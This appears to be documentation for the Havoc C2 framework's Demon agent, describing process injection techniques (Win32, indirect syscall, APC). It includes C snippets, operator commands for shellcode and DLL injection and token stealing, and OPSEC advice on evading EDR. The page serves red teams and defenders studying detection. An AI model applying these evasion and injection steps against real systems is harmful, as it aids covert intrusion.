Skip to main content

Documentation Index

Fetch the complete documentation index at: https://mintlify.com/HavocFramework/Havoc/llms.txt

Use this file to discover all available pages before exploring further.

Overview

Demon supports multiple process injection techniques for executing shellcode or DLLs in remote processes. The injection system offers flexibility in choosing between stealthy syscall-based methods and faster Win32 API approaches.

Injection Methods

Demon distinguishes between two primary injection scenarios:

Inject

Inject code into an existing process by PID.Requires:
  • Target process ID
  • Sufficient permissions
  • Compatible architecture

Spawn

Create a new sacrificial process and inject code (fork & run).Advantages:
  • Controlled process environment
  • No target process required
  • Cleaner OPSEC

Injection Techniques

Technique 1: Win32 API

Value: INJECTION_TECHNIQUE_WIN32 (1) Uses high-level Win32 APIs for injection operations. 
Demon:
  Injection:
    Technique: 1
For Spawn:
  1. CreateProcessA - Create suspended process
Memory Operations: 2. VirtualAllocEx - Allocate memory 3. WriteProcessMemory - Write shellcode 4. VirtualProtectEx - Change to RX protectionThread Creation: 5. CreateRemoteThread - Start execution 6. ResumeThread - Resume main thread (if spawned)
Characteristics:
  • ✅ Fast and stable
  • ✅ Simple implementation
  • ✅ Compatible with all targets
  • ❌ Heavily hooked by EDR
  • ❌ High detection rate
  • ❌ Leaves obvious forensic traces
When to use:
  • Testing environments
  • No EDR present
  • Speed prioritized over stealth

Technique 2: Syscall

Value: INJECTION_TECHNIQUE_SYSCALL (2) Recommended - Uses indirect syscalls to bypass userland hooks. 
Demon:
  Injection:
    Technique: 2
For Spawn:
  1. CreateProcessA - Create suspended process (no syscall alternative)
Memory Operations: 2. NtAllocateVirtualMemory* - Allocate memory 3. NtWriteVirtualMemory* - Write shellcode
4. NtProtectVirtualMemory* - Change to RX protectionThread Creation: 5. NtCreateThreadEx* - Start execution 6. NtResumeThread* - Resume thread* = Indirect syscall
Characteristics:
  • ✅ Bypasses userland EDR hooks
  • ✅ Stealthy execution
  • ✅ Production-ready
  • ✅ Return address spoofing available
  • ❌ Slightly slower than Win32
  • ❌ More complex implementation
When to use:
  • Production operations
  • EDR present
  • Stealth prioritized
Implementation Details: 
// Memory allocation via syscall
DWORD MmVirtualAlloc(
    DWORD Method,
    HANDLE hProcess,
    SIZE_T Size,
    DWORD Protection
) {
    if (Method == DX_MEM_SYSCALL) {
        return SysNtAllocateVirtualMemory(
            hProcess,
            &Address,
            0,
            &Size,
            MEM_COMMIT | MEM_RESERVE,
            Protection
        );
    } else {
        return Instance->Win32.VirtualAllocEx(
            hProcess,
            NULL,
            Size,
            MEM_COMMIT | MEM_RESERVE,
            Protection
        );
    }
}

Technique 3: APC Injection

Value: INJECTION_TECHNIQUE_APC (3) Queues Asynchronous Procedure Calls (APCs) to existing threads. 
Demon:
  Injection:
    Technique: 3
  1. NtAllocateVirtualMemory* - Allocate memory
  2. NtWriteVirtualMemory* - Write shellcode
  3. NtProtectVirtualMemory* - Set RX protection
  4. Enumerate threads in target process
  5. For each thread:
    • NtOpenThread* - Open thread
    • NtQueueApcThread* - Queue APC pointing to shellcode
  6. APCs execute when threads enter alertable wait state
Characteristics:
  • ✅ No new thread creation
  • ✅ Stealthy (uses existing threads)
  • ✅ Bypasses some thread creation monitoring
  • ❌ Requires alertable wait state
  • ❌ Execution timing unpredictable
  • ❌ May not execute immediately
When to use:
  • Target has alertable threads
  • Thread creation is monitored
  • Delayed execution acceptable
APC injection requires target threads to enter an alertable wait state. Execution may be delayed or may not occur if threads never wait alertably.

Thread Creation Methods

When creating threads in remote processes, Demon supports multiple methods:

DX_THREAD_WIN32

Uses CreateRemoteThread API. 
HANDLE hThread = Instance->Win32.CreateRemoteThread(
    hProcess,
    NULL,
    0,
    EntryPoint,
    Parameter,
    0,
    &ThreadId
);
Pros: Simple, widely compatible
Cons: Heavily monitored by EDR

DX_THREAD_SYSCALL

Recommended - Uses NtCreateThreadEx via indirect syscall. 
NTSTATUS status = SysNtCreateThreadEx(
    &hThread,
    THREAD_ALL_ACCESS,
    NULL,
    hProcess,
    EntryPoint,
    Parameter,
    FALSE,  // Not suspended
    0,
    0x1000 * 20,  // Stack size
    0x1000 * 20,  // Max stack
    NULL
);
Pros: Bypasses hooks, stealthy
Cons: Requires syscall infrastructure

DX_THREAD_APC

Queues an APC instead of creating a thread. 
for (each thread in process) {
    HANDLE hThread = OpenThread(thread_id);
    NtQueueApcThread(
        hThread,
        EntryPoint,
        Parameter,
        NULL,
        NULL
    );
}
Pros: No thread creation, stealthy
Cons: Unreliable execution timing

Memory Allocation Methods

DX_MEM_WIN32

Uses VirtualAllocEx for memory operations. 
LPVOID memory = Instance->Win32.VirtualAllocEx(
    hProcess,
    NULL,
    size,
    MEM_COMMIT | MEM_RESERVE,
    PAGE_READWRITE
);
Configuration: 
config memory alloc 1  # Win32

DX_MEM_SYSCALL

Recommended - Uses NtAllocateVirtualMemory via indirect syscall. 
NTSTATUS status = SysNtAllocateVirtualMemory(
    hProcess,
    &address,
    0,
    &size,
    MEM_COMMIT | MEM_RESERVE,
    PAGE_READWRITE
);
Configuration: 
config memory alloc 2  # Syscall

Spawn Process Configuration

When using fork & run (spawn) techniques, Demon spawns a sacrificial process. Configure these in the profile or at runtime:

Profile Configuration

Demon:
  Injection:
    Spawn64: "C:\\Windows\\System32\\notepad.exe"
    Spawn32: "C:\\Windows\\SysWOW64\\notepad.exe"

Runtime Configuration

# Set x64 spawn process
config injection spawn64 C:\Windows\System32\dllhost.exe

# Set x86 spawn process  
config injection spawn32 C:\Windows\SysWOW64\dllhost.exe
notepad.exe
x64: C:\Windows\System32\notepad.exe
x86: C:\Windows\SysWOW64\notepad.exe
  • ✅ Always available
  • ✅ Commonly spawned
  • ❌ GUI application (creates window)
Environment-Specific Choices:
  • Corporate: Use common business apps (outlook.exe, excel.exe)
  • Servers: Use service processes (w3wp.exe, svchost.exe)
  • Developer machines: Use dev tools (devenv.exe, msbuild.exe)

Command Usage

Shellcode Injection

Inject shellcode into an existing process: 
shellcode inject [arch] [pid] [path]
Example: 
shellcode inject x64 1234 /root/payload.bin
Process:
  1. Open handle to target process (PID 1234)
  2. Verify architecture matches
  3. Allocate memory based on configured method
  4. Write shellcode to allocated memory
  5. Change protection to PAGE_EXECUTE_READ
  6. Create thread at shellcode entry point

Shellcode Spawn

Spawn a new process and inject shellcode: 
shellcode spawn [arch] [path]
Example: 
shellcode spawn x64 /root/payload.bin
Process:
  1. Create configured spawn process in suspended state
  2. Allocate memory in new process
  3. Write shellcode
  4. Change protection to PAGE_EXECUTE_READ
  5. Create remote thread
  6. Resume main thread

DLL Injection

Inject a reflective DLL: 
inject-dll [pid] [path]
Features:
  • Uses reflective loader
  • Supports DLL arguments
  • Returns output from DLL

OPSEC Considerations

Architecture Mismatch

Demon validates architecture before injection:
SupportedBoth same architecture, full compatibility.
SupportedBoth same architecture, full compatibility.
⚠️ Supported with limitationsRequires Heaven’s Gate technique for 64→32-bit transitions. Not all injection methods work reliably.
Not Supported32-bit process cannot inject into 64-bit process. Error: INJECT_ERROR_PROCESS_ARCH_MISMATCH

Process Permissions

Injection requires specific permissions: Minimum required:
  • PROCESS_VM_OPERATION - Memory operations
  • PROCESS_VM_WRITE - Write shellcode
  • PROCESS_CREATE_THREAD - Create execution thread
Opening process: 
HANDLE hProcess = ProcessOpen(pid, PROCESS_ALL_ACCESS);
If access denied:
  1. Steal token with SeDebugPrivilege
  2. Impersonate SYSTEM or high-privileged user
  3. Retry injection

Detection Vectors

Risk: EDR scans for suspicious memory patternsIndicators:
  • Unbacked memory regions (not from files)
  • RWX memory pages
  • Known shellcode signatures
  • Anomalous memory allocations
Mitigation:
  • Use RW during write, then change to RX
  • Encrypt shellcode before writing
  • Use existing executable memory regions
  • Avoid large contiguous allocations

Best Practices

1

Choose Appropriate Technique

  • Low security: Win32 (speed)
  • Medium security: Syscall
  • High security: Syscall + APC
2

Select Context-Appropriate Target

Match spawn process to environment:
  • Corporate: Business applications
  • Server: Service processes
  • Developer: Development tools
3

Verify Permissions

Ensure you have necessary privileges:
token privs-get  # Enable all privileges
token getuid     # Verify current context
4

Test Architecture Compatibility

proc list  # Check target architecture
Ensure match before injection.
5

Monitor for Detection

After injection:
  • Watch for process termination
  • Check callback success
  • Verify no alerts in target environment

Error Handling

Common Errors

Cause: Missing or invalid parametersCheck:
  • PID specified and valid
  • Shellcode path exists
  • Architecture specified correctly
Cause: Architecture incompatibilitySolutions:
  • Use matching architecture payload
  • Target different process
  • Use x64 Demon for flexibility
Cause: Generic injection failureCommon reasons:
  • Insufficient permissions
  • Protected process (PPL)
  • Memory allocation failed
  • EDR blocked operation
Debug:
# Check privileges
token privs-list

# Try with elevated token
token steal [high_priv_pid]
token impersonate [id]

# Retry injection

Advanced Techniques

Module Stomping

Overwrite existing module memory instead of allocating new regions. Advantages:
  • No suspicious unbacked memory
  • Appears as part of legitimate module
  • Thread starts in known module
Implementation: (Not built-in, requires custom BOF)

Process Hollowing

Create process in suspended state, unmap original image, map payload. Advantages:
  • Process appears legitimate
  • No remote memory allocation
  • Complex to detect
Implementation: (Not built-in, requires custom BOF)

Thread Hijacking

Suspend thread, modify context to point to shellcode, resume. Advantages:
  • No thread creation
  • Uses existing thread
  • Stealthy
Implementation: (Not built-in, requires custom BOF)

Configuration Reference

Profile Configuration

Demon:
  Injection:
    # Injection technique
    Technique: 2  # 1=Win32, 2=Syscall, 3=APC
    
    # Spawn processes
    Spawn64: "C:\\Windows\\System32\\dllhost.exe"
    Spawn32: "C:\\Windows\\SysWOW64\\dllhost.exe"

Runtime Configuration

# View current config
config

# Change injection technique
config injection technique 2

# Change memory allocation method
config memory alloc 2     # 1=Win32, 2=Syscall
config memory execute 2   # 1=Win32, 2=Syscall

# Change spawn processes
config injection spawn64 C:\Windows\System32\notepad.exe
config injection spawn32 C:\Windows\SysWOW64\notepad.exe

Next Steps

Sleep Obfuscation

Configure memory encryption during sleep

Features Overview

Explore all Demon capabilities

Command Reference

Complete command documentation

Generate Payloads

Create configured Demon agents

Build docs developers (and LLMs) love

Get started for freeTalk to us